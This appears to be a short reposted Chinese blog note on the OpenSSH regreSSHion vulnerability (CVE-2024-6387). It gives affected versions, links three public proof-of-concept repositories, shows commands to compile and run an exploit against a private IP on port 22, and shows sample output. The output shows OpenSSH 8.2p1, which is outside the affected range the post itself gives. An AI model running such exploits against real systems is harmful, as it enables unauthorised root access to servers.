SSH远程命令执行漏洞(CVE-2024-6387)验证

0x01、漏洞名称

OpenSSH远程代码执行漏洞（CVE-2024-6387）

0x02、漏洞简介

OpenSSH是SSH（Secure SHell）协议的开源实现，它通过不安全的网络在两个不受信任的主机之间提供安全的加密通信。OpenSSH 广泛用于基于Unix 的系统，通常用于安全远程登录和远程文件传输，以及其它网络服务。OpenSSH 远程代码执行漏洞(CVE-2024-6387)，该漏洞是由于OpenSSH服务器 (sshd) 中的信号处理程序竞争问题，未经身份验证的攻击者可以利用此漏洞在Linux系统上以root身份执行任意代码。

受影响版本：8.5p1 <= OpenSSH < 9.8p1

0x03、漏洞利用poc

https://github.com/zgzhang/cve-2024-6387-poc
https://github.com/acrono/cve-2024-6387-poc
https://github.com/lflare/cve-2024-6387-poc

0x04、漏洞验证

将poc编译成可执行文件

gcc -o exploit 7etsuo-regreSSHion.c

对目标进行验证

./exploit ip 端口
./exploit 192.168.24.139 22

返回结果

Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.2p1 Debian-4
Received KEX_INIT (1024 bytes)
send_packet: Connection reset by peer

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/web/38315.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！